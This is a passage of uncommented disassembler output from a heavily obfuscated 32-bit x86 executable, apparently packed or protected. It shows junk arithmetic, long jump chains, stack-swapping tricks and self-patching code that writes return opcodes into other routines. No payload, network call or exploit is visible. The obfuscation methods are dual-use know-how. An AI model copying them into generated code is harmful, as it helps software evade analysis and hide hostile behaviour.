add eax, 94795D94h
jmp loc_44B749
sub_44F9A1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44F9C8: ; CODE XREF: ut7h7i2x:0044FB03j
ja loc_43F08F
; START OF FUNCTION CHUNK FOR sub_442A4D
loc_44F9CE: ; CODE XREF: sub_442A4D:loc_444ECAj
xor esi, 4B850B8Eh
add esi, 8C7DACBh
mov [esi], eax
pop esi
lea eax, loc_454626
push offset loc_454AE4
jmp nullsub_557
; END OF FUNCTION CHUNK FOR sub_442A4D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_44F9ED: ; CODE XREF: sub_4549F0-DA01j
call sub_43CA2D
call sub_44C87F
loc_44F9F7: ; CODE XREF: ut7h7i2x:0044A6FAj
jl loc_448581
or ecx, edi
rol edx, 15h
loc_44FA02: ; CODE XREF: ut7h7i2x:0043D90Fj
add edi, 9067DEDFh
jmp loc_450493
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
loc_44FA0D: ; CODE XREF: ut7h7i2x:004509EDj
sub ecx, 319882A6h
loc_44FA13: ; CODE XREF: ut7h7i2x:004405E8j
add ecx, 434CBDE1h
xchg ecx, [esp]
jmp nullsub_418
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_291. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_44FA22: ; CODE XREF: sub_44445F+14927j
jmp loc_457A9B
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45168E
loc_44FA27: ; CODE XREF: sub_45168E+Bj
jmp loc_45972C
; END OF FUNCTION CHUNK FOR sub_45168E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F000
loc_44FA2C: ; CODE XREF: sub_44F000+10j
jmp loc_4599AC
; END OF FUNCTION CHUNK FOR sub_44F000
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7B6
loc_44FA31: ; CODE XREF: sub_43F7B6+8CC9j
; ut7h7i2x:0045861Bj
mov eax, [ebp-4]
push offset loc_43BF18
loc_44FA39: ; CODE XREF: sub_4492A1:loc_458128j
jmp nullsub_121
; END OF FUNCTION CHUNK FOR sub_43F7B6
; ---------------------------------------------------------------------------
loc_44FA3E: ; CODE XREF: ut7h7i2x:0043EC0Aj
test esi, ecx
jmp loc_44ECF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A06
loc_44FA45: ; CODE XREF: sub_443A06-9F35j
; ut7h7i2x:loc_4489C6j
push esi
push 0CB7A7D86h
loc_44FA4B: ; CODE XREF: sub_443A06:loc_43F9B9j
call sub_44FA51
retn
; END OF FUNCTION CHUNK FOR sub_443A06
; =============== S U B R O U T I N E =======================================
sub_44FA51 proc near ; CODE XREF: ut7h7i2x:loc_43C42Dp
; sub_443A06:loc_44FA4Bp
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 00440803 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044453B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444842 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458807 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00458822 SIZE 0000000A BYTES
jnz loc_458822
call sub_446599
push ecx
mov ecx, [esp+4+arg_8]
jmp loc_444842
sub_44FA51 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4448AF
loc_44FA66: ; CODE XREF: sub_4448AF:loc_44488Ej
sub ecx, 52205B32h
xor ecx, 9A6D3953h
call sub_43AF72
loc_44FA77: ; CODE XREF: sub_43EE25+8j
jmp loc_4559F6
; END OF FUNCTION CHUNK FOR sub_4448AF
; ---------------------------------------------------------------------------
loc_44FA7C: ; CODE XREF: ut7h7i2x:004467D8j
jz loc_456678
jmp loc_454156
; ---------------------------------------------------------------------------
loc_44FA87: ; DATA XREF: ut7h7i2x:004596C7o
shr ecx, 18h
shl ebx, 1Ch
pop eax
pop edx
jmp loc_45898A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AC40
loc_44FA94: ; CODE XREF: sub_44AC40:loc_45293Cj
; sub_44AC40+7D0Bj
add ebx, 7E241432h
popf
xchg ebx, [esp+4+var_4]
jmp sub_449FD5
; END OF FUNCTION CHUNK FOR sub_44AC40
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_243. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44FAA4: ; CODE XREF: ut7h7i2x:00459B24j
jmp loc_445598
; ---------------------------------------------------------------------------
loc_44FAA9: ; CODE XREF: ut7h7i2x:0045441Ej
jmp loc_43B6E1
; ---------------------------------------------------------------------------
loc_44FAAE: ; DATA XREF: ut7h7i2x:0045912Co
xchg ebx, [esp]
mov ebp, eax
xchg ebp, [esp]
push esi
mov esi, edx
xchg esi, [esp]
push ebx
jmp loc_456107
; =============== S U B R O U T I N E =======================================
sub_44FAC2 proc near ; CODE XREF: sub_43B727:loc_44BA6Cp
xchg esi, [esp+0]
pop esi
lea eax, sub_444A08
mov byte ptr [eax], 0C3h
jmp sub_444A08
sub_44FAC2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445FA9
loc_44FAD4: ; CODE XREF: sub_445FA9+5j
mov eax, [esp+0]
jmp loc_4517AB
; END OF FUNCTION CHUNK FOR sub_445FA9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440944
loc_44FADC: ; CODE XREF: sub_440944:loc_4566D5j
jz loc_449EA8
jmp loc_43FD55
; END OF FUNCTION CHUNK FOR sub_440944
; ---------------------------------------------------------------------------
test al, al
jz loc_4406D4
jmp loc_442EAC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_365. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44FAF5: ; CODE XREF: ut7h7i2x:0044824Dj
jmp loc_457912
; ---------------------------------------------------------------------------
loc_44FAFA: ; CODE XREF: ut7h7i2x:00444EE8j
ja loc_441532
pushf
cmp edx, edi
jmp loc_44F9C8
; ---------------------------------------------------------------------------
loc_44FB08: ; DATA XREF: ut7h7i2x:00447438o
xchg ecx, [esp]
push esi
push 9FC0B8DFh
loc_44FB11: ; CODE XREF: ut7h7i2x:loc_45272Ej
pop esi
jmp loc_454A37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_44FB17: ; CODE XREF: sub_43CCC3+E4CDj
popf
; END OF FUNCTION CHUNK FOR sub_43CCC3
; START OF FUNCTION CHUNK FOR sub_445056
loc_44FB18: ; CODE XREF: sub_445056:loc_449CFCj
xchg eax, ebx
sbb ecx, 70ABE94Dh
mov [edx], ebp
jmp loc_440D0B
; END OF FUNCTION CHUNK FOR sub_445056
; ---------------------------------------------------------------------------
loc_44FB27: ; CODE XREF: ut7h7i2x:loc_459BCEj
jp loc_45802F
jmp loc_43FA26
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457818
loc_44FB32: ; CODE XREF: sub_457818-20B7j
jnz loc_44F23E
loc_44FB38: ; CODE XREF: sub_439B27+137F3j
jmp loc_43ABA5
; END OF FUNCTION CHUNK FOR sub_457818
; ---------------------------------------------------------------------------
xor ebp, eax
xor ebx, 8F7B09F7h
test edi, 0B4F3FA01h
jmp loc_44F230
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C852
loc_44FB50: ; CODE XREF: sub_44C852:loc_4504CCj
push 0F084CD79h
pop ebx
and ebx, 6C25719Ah
cmp ebx, 5725733h
jmp loc_43DDCE
; END OF FUNCTION CHUNK FOR sub_44C852
; =============== S U B R O U T I N E =======================================
sub_44FB67 proc near ; CODE XREF: sub_45A8FCj
; DATA XREF: sub_45A8EC+6o
mov eax, ds:dword_456330
or eax, eax
jnz loc_43B0CF
jmp loc_44E2D5
sub_44FB67 endp
; ---------------------------------------------------------------------------
sub esi, 0CD25CB56h
jge loc_459E5F
jmp sub_45967C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F66D
loc_44FB8B: ; CODE XREF: sub_43F66D:loc_43CDCEj
push 0C51C642Ch
pop ecx
add ecx, 733201A9h
test ecx, 20000000h
jmp loc_445DFD
; END OF FUNCTION CHUNK FOR sub_43F66D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44FBA2: ; CODE XREF: sub_439BF8:loc_452426j
rol edx, 19h
xor edx, 76FC1A79h
loc_44FBAB: ; CODE XREF: ut7h7i2x:loc_455847j
push esi
pushf
jmp loc_455167
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
jno loc_44BFE1
; START OF FUNCTION CHUNK FOR sub_44937E
loc_44FBB8: ; CODE XREF: sub_44937E-5D94j
xchg ebx, [esp+0]
push ebx
pop edx
pop ebx
mov eax, [esp-4+arg_0]
push ecx
jmp loc_452CE0
; END OF FUNCTION CHUNK FOR sub_44937E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_44FBC7: ; CODE XREF: sub_455060:loc_44BA5Aj
add ecx, 55F59D5Dh
xor ecx, 8DBE8CA9h
add ecx, ebp
add ecx, 997387D8h
mov [ecx], eax
pop ecx
mov eax, [ebp-4]
mov al, [eax]
jmp loc_458409
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
locret_44FBE8: ; CODE XREF: ut7h7i2x:00455B73j
retn
; ---------------------------------------------------------------------------
loc_44FBE9: ; DATA XREF: ut7h7i2x:loc_43ABFDo
mov eax, 400h
call sub_459036
push esi
push 80C4C424h
pop esi
add esi, 6F708D23h
or esi, 19BCED40h
jmp loc_45495F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E3FD
loc_44FC0B: ; CODE XREF: sub_44E3FD:loc_43EE3Dj
xchg edi, [esp+0]
jmp loc_44CF62
; END OF FUNCTION CHUNK FOR sub_44E3FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FD5
loc_44FC13: ; CODE XREF: sub_449FD5-1F73j
jnb loc_4441DC
mov [edx], ebx
adc ebx, 131CB878h
sub esi, 0BA92ADFEh
jmp loc_442416
; END OF FUNCTION CHUNK FOR sub_449FD5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_44FC2C: ; CODE XREF: sub_44F495-EFA7j
or eax, 283DE658h
xor eax, 0EFB1C35Ah
call sub_43AA94
loc_44FC3D: ; CODE XREF: ut7h7i2x:loc_455F7Dj
push edi
jmp loc_455D7A
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_44FC43: ; CODE XREF: sub_44E2C4+40EAj
jnz loc_44F7EA
loc_44FC49: ; CODE XREF: sub_458CA4-15B35j
jmp loc_44DCD2
; END OF FUNCTION CHUNK FOR sub_44E2C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4442CC
loc_44FC4E: ; CODE XREF: sub_4442CC-1914j
jmp loc_44D64E
; END OF FUNCTION CHUNK FOR sub_4442CC
; ---------------------------------------------------------------------------
mov esi, ecx
cmp edi, 2322324Fh
jmp loc_45A4DA
; =============== S U B R O U T I N E =======================================
sub_44FC60 proc near ; CODE XREF: sub_43A513:loc_452185p
; ut7h7i2x:0045AB5Dj
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0043B49B SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043E817 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00440A9A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004470D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A32A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044B6B8 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00450ECA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453DD5 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004581B8 SIZE 0000001B BYTES
xchg esi, [esp+8+var_8]
pop esi
jz loc_440A9A
test byte ptr [ebp-8], 40h
jz loc_450ECA
jmp loc_459F88
sub_44FC60 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_109. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44FC7A: ; CODE XREF: ut7h7i2x:0044277Ej
jmp loc_44C8BB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_331. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44FC80: ; CODE XREF: ut7h7i2x:0044618Fj
jmp loc_44EFE9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D43D
loc_44FC85: ; CODE XREF: sub_44D43D:loc_443240j
add esi, 70408A5Ch
mov [esi], eax
pop esi
lea eax, sub_44D43D
push offset loc_44466E
jmp nullsub_398
; END OF FUNCTION CHUNK FOR sub_44D43D
; ---------------------------------------------------------------------------
loc_44FC9E: ; CODE XREF: ut7h7i2x:0043F347j
adc ebx, 9530F9FCh
loc_44FCA4: ; CODE XREF: ut7h7i2x:00451ACBj
xor edx, 7CE58D6Fh
add edx, 8B56643Ch
xchg edx, [esp]
jmp sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4518D7
loc_44FCB8: ; CODE XREF: sub_4518D7:loc_43F0D1j
pop eax
pop edx
pop ecx
xchg ebp, [esp-0Ch+arg_8]
jmp loc_44BA71
; END OF FUNCTION CHUNK FOR sub_4518D7
; ---------------------------------------------------------------------------
loc_44FCC3: ; DATA XREF: sub_43DCFF+Eo
push edx
mov edx, ebx
xchg edx, [esp]
mov ebx, edx
xchg ebx, [esp]
push offset loc_45ACA7
jmp loc_43E3E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_44FCD8: ; CODE XREF: sub_44EC11:loc_43D3C6j
ror ecx, 0Fh
or ebx, 0EF247D70h
xor eax, ebp
jmp loc_44EE86
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
locret_44FCE8: ; CODE XREF: ut7h7i2x:loc_44E5A6j
retn
; ---------------------------------------------------------------------------
loc_44FCE9: ; CODE XREF: ut7h7i2x:loc_447582j
xchg esi, [esp]
push 619B7CC0h
pop eax
or eax, 1EC1270Fh
add eax, 923F3119h
jmp loc_44ECBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B72F
loc_44FD03: ; CODE XREF: ut7h7i2x:004455AEj
; sub_44B72F:loc_4528D0j
call sub_43FF65
retn
; END OF FUNCTION CHUNK FOR sub_44B72F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_44FD09: ; CODE XREF: sub_43FF65+113B3j
jmp sub_44E2C4
; END OF FUNCTION CHUNK FOR sub_43FF65
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_17. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4448AF
loc_44FD0F: ; CODE XREF: sub_4448AF:loc_43AC6Bj
; ut7h7i2x:004492C7j
mov eax, [ebp-4]
push eax
push ebx
push 0A432B499h
pop ebx
xor ebx, 545A4570h
jmp loc_453B77
; END OF FUNCTION CHUNK FOR sub_4448AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45854D
loc_44FD25: ; CODE XREF: sub_45854D-1E867j
; sub_45854D:loc_43ED14j
push eax
lea eax, dword_43AEC4
call sub_43C2F9
; END OF FUNCTION CHUNK FOR sub_45854D
; START OF FUNCTION CHUNK FOR sub_457A66
loc_44FD31: ; CODE XREF: sub_457A66+4j
jmp loc_444E8E
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443C4A
loc_44FD36: ; CODE XREF: sub_443C4A:loc_43BEE5j
sub ebp, 819CAD29h
jmp sub_451EDF
; END OF FUNCTION CHUNK FOR sub_443C4A
; ---------------------------------------------------------------------------
loc_44FD41: ; CODE XREF: ut7h7i2x:0043F0E1j
jp loc_439546
sbb ecx, eax
jmp loc_441FB4
; ---------------------------------------------------------------------------
loc_44FD4E: ; CODE XREF: ut7h7i2x:0045620Bj
js loc_43BADA
; =============== S U B R O U T I N E =======================================
sub_44FD54 proc near ; CODE XREF: sub_43CE34+10162p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00451C6C SIZE 00000016 BYTES
xchg eax, [esp+0]
pop eax
mov byte ptr [eax], 6Ch
inc dword ptr [ebp-20h]
jmp loc_451C6C
sub_44FD54 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push 0EA6AEA6Fh
pop eax
sub eax, 0FE4BE97Bh
add eax, 6E923286h
call sub_43AA94
jmp loc_44625E
; ---------------------------------------------------------------------------
sbb edi, edx
jmp loc_459D9D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E54
loc_44FD86: ; CODE XREF: sub_459E54:loc_459E5Fj
push 0AA3580BBh
pop eax
and eax, 1E77CD3Ch
add eax, 2DAE8620h
test eax, 1000h
jmp loc_442E5C
; END OF FUNCTION CHUNK FOR sub_459E54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F738
loc_44FDA3: ; CODE XREF: sub_44F738-A33Cj
jnz loc_4524BB
jmp loc_452A85
; END OF FUNCTION CHUNK FOR sub_44F738
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4519D2
loc_44FDAE: ; CODE XREF: sub_4519D2-148D3j
pop ebp
jmp loc_44E6F1
; END OF FUNCTION CHUNK FOR sub_4519D2
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push ecx
push ebx
jmp loc_447299
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_44FDBF: ; CODE XREF: sub_446320:loc_43DDC9j
jz loc_44809B
jmp loc_454423
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_44FDCA: ; CODE XREF: sub_43A513+12A2Bj
call sub_44FDD8
pop ecx
loc_44FDD0: ; CODE XREF: ut7h7i2x:loc_4426D3j
mov [ebp-20h], eax
jmp loc_452185
; END OF FUNCTION CHUNK FOR sub_43A513
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44FDD8 proc near ; CODE XREF: sub_43A513:loc_44FDCAp
push ebp
mov ebp, esp
jmp sub_4532D3
sub_44FDD8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447DDB
loc_44FDE0: ; CODE XREF: sub_447DDB:loc_43BD54j
xor edx, edx
call sub_43B34F
; END OF FUNCTION CHUNK FOR sub_447DDB
; START OF FUNCTION CHUNK FOR sub_4497C1
loc_44FDE7: ; CODE XREF: sub_4497C1+8FABj
jmp loc_447629
; END OF FUNCTION CHUNK FOR sub_4497C1
; ---------------------------------------------------------------------------
loc_44FDEC: ; CODE XREF: ut7h7i2x:00442731j
jp loc_455365
; =============== S U B R O U T I N E =======================================
sub_44FDF2 proc near ; CODE XREF: sub_44B122:loc_43D9E1p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004395CE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DD60 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00444881 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444DF5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004462FC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447EA4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044912B SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045541B SIZE 00000019 BYTES
xchg eax, [esp+0]
pop eax
xchg ebx, [esp+0]
jmp loc_45541B
sub_44FDF2 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_159. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AF72
loc_44FDFF: ; CODE XREF: sub_43AF72+15j
jmp loc_454086
; END OF FUNCTION CHUNK FOR sub_43AF72
; =============== S U B R O U T I N E =======================================
sub_44FE04 proc near ; DATA XREF: sub_44C8F3+6B76o
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
sub_44FE04 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E68B
loc_44FE0B: ; CODE XREF: sub_43E68B+6j
rol eax, 6
push eax
retn
; END OF FUNCTION CHUNK FOR sub_43E68B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442D06
loc_44FE10: ; CODE XREF: sub_442D06:loc_439E66j
mov esp, ebp
push offset sub_449B8E
jmp nullsub_540
; END OF FUNCTION CHUNK FOR sub_442D06
; ---------------------------------------------------------------------------
test al, al
jz loc_43E870
jmp loc_4492DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44FE29: ; CODE XREF: sub_439BF8:loc_43FF09j
jz loc_456EB1
jmp loc_44C024
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
shl esi, 4
sub ebx, ebp
jmp sub_4474B1
; ---------------------------------------------------------------------------
loc_44FE3E: ; CODE XREF: ut7h7i2x:0043BF64j
mov ebp, eax
xchg ebp, [esp]
mov eax, [ebp-4]
push eax
call sub_4580CF
test eax, eax
jmp loc_454409
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446258
loc_44FE53: ; CODE XREF: sub_446258-AFDBj
push 54F92FFFh
jmp loc_456EB1
; END OF FUNCTION CHUNK FOR sub_446258
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44FE5D: ; CODE XREF: sub_439BF8:loc_44A583j
cmp dword ptr [ebp-4], 7
jnz loc_4484F2
jmp loc_44AAD9
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_44FE6C: ; CODE XREF: sub_44F495-5F8Fj
call sub_442872
cmp dword ptr [ebp-8], 0
jz loc_43A61A
jmp loc_45206D
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4463D6
loc_44FE80: ; CODE XREF: sub_4463D6:loc_451F19j
xchg ecx, [esp+0]
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_4463D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_44FE88: ; CODE XREF: sub_43F7A5+DB48j
shl eax, 0Fh
add [ebp-8], eax
mov eax, [ebp-8]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_44FE95: ; CODE XREF: sub_43F7A5-5169j
; sub_43F7A5:loc_448E33j
mov eax, [ebp-0Ch]
movzx eax, byte ptr [eax]
jmp loc_442D89
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456DB3
loc_44FEA0: ; CODE XREF: sub_456DB3:loc_4422C0j
jnz loc_44F16D
not eax
jmp loc_44F163
; END OF FUNCTION CHUNK FOR sub_456DB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4508DB
loc_44FEAD: ; CODE XREF: sub_4508DB:loc_4553D4j
push 0E59665C3h
pop eax
xor eax, 50D59731h
test eax, 10000000h
jmp loc_43E7D0
; END OF FUNCTION CHUNK FOR sub_4508DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F0B0
loc_44FEC4: ; CODE XREF: sub_43F0B0+19D49j
js loc_443ABC
sbb edi, 52299C47h
loc_44FED0: ; CODE XREF: sub_43F0B0:loc_459AE8j
push 4DA50339h
pop eax
sub eax, 28978562h
jns loc_458016
; END OF FUNCTION CHUNK FOR sub_43F0B0
; START OF FUNCTION CHUNK FOR sub_44B85E
loc_44FEE2: ; CODE XREF: sub_44B85E-4571j
jmp loc_45A7B8
; END OF FUNCTION CHUNK FOR sub_44B85E
; ---------------------------------------------------------------------------
jbe loc_439EAE
jmp loc_43ADD4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455145
loc_44FEF2: ; CODE XREF: sub_455145:loc_45677Dj
and eax, 7A6C203Fh
; END OF FUNCTION CHUNK FOR sub_455145
; =============== S U B R O U T I N E =======================================
sub_44FEF8 proc near ; CODE XREF: ut7h7i2x:0045855Ep
xchg edi, [esp+0]
pop edi
lea eax, nullsub_1
mov byte ptr [eax], 0C3h
jmp loc_45AB2A
sub_44FEF8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44FF0A proc near ; CODE XREF: sub_417C7B+30p
; ut7h7i2x:0044A638j
; DATA XREF: ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00441052 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004519CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456783 SIZE 0000001A BYTES
push edi
jmp loc_441052
sub_44FF0A endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_470. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44FF11: ; CODE XREF: sub_43A556+134C0j
jmp loc_45A065
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E944
loc_44FF16: ; CODE XREF: sub_43E944+Aj
jmp nullsub_509
; END OF FUNCTION CHUNK FOR sub_43E944
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_44FF1B: ; CODE XREF: sub_4524FE-18977j
jmp loc_43DB70
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
loc_44FF20: ; CODE XREF: ut7h7i2x:00447D21j
xor eax, 149D9F60h
js loc_4495D0
mov eax, 5AC67211h
ror edx, 4
pop eax
jmp loc_4495D0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441C8F
loc_44FF3A: ; CODE XREF: sub_441C8F:loc_43E771j
test eax, eax
jl loc_454C5C
inc eax
mov [ebp-1Ch], eax
mov dword ptr [ebp-18h], 0
jmp loc_44B6AB
; END OF FUNCTION CHUNK FOR sub_441C8F
; ---------------------------------------------------------------------------
mov ds:off_41D018, eax
lea eax, sub_449EE1
mov byte ptr [eax], 0C3h
jmp loc_44AC2C
; =============== S U B R O U T I N E =======================================
sub_44FF66 proc near ; CODE XREF: sub_419F99+82p
; ut7h7i2x:0043C23Bj
; DATA XREF: ...
; FUNCTION CHUNK AT 0043D4A6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445425 SIZE 00000011 BYTES
push esi
push 0BA8F82C7h
pop esi
add esi, 0CA8AEBCDh
sub esi, 0E97A021Ah
loc_44FF79: ; CODE XREF: ut7h7i2x:loc_44F5E9j
jmp loc_43D4A6
sub_44FF66 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4448D7
loc_44FF7E: ; CODE XREF: sub_4448D7+Fj
lea eax, loc_45890F
mov byte ptr [eax], 0C3h
jmp loc_43ACA6
; ---------------------------------------------------------------------------
loc_44FF8C: ; CODE XREF: sub_4448D7+14039j
mov eax, [esp-8+arg_4]
push edx
push offset sub_459081
jmp loc_444787
; END OF FUNCTION CHUNK FOR sub_4448D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455C28
loc_44FF9A: ; CODE XREF: sub_455C28:loc_44852Cj
pop esi
lea eax, sub_45A599
mov byte ptr [eax], 0C3h
; END OF FUNCTION CHUNK FOR sub_455C28
; START OF FUNCTION CHUNK FOR sub_43CA2D
loc_44FFA4: ; CODE XREF: sub_43CA2D:loc_443D12j
jmp loc_45261D
; END OF FUNCTION CHUNK FOR sub_43CA2D
; ---------------------------------------------------------------------------
call nullsub_18
jmp ds:dword_41D128
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_44FFB4: ; CODE XREF: sub_439BD1+174F0j
jmp loc_43FE41
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
loc_44FFB9: ; CODE XREF: ut7h7i2x:004478A6j
jmp loc_43CAA3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_18. PRESS KEYPAD "+" TO EXPAND]
db 88h
dd 5BAAh, 8E2E9h, 0F38B5A00h, 4CE9D33Bh
db 4Bh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_44FFD3: ; CODE XREF: ut7h7i2x:0043D23Ej
jl loc_44EAB5
loc_44FFD9: ; CODE XREF: ut7h7i2x:004508CFj
jmp loc_4496AC
; ---------------------------------------------------------------------------
rol ecx, 2
jmp loc_44EAB2
; ---------------------------------------------------------------------------
cmp ebp, 0B1ADF1CDh
jmp loc_458BD5
; ---------------------------------------------------------------------------
mov ds:dword_41D05C, eax
lea eax, nullsub_442
push offset sub_43B32F
jmp locret_43BF69
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_450007: ; CODE XREF: sub_43AB62-C8Cj
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jnz loc_4518EB
jmp loc_44C4E5
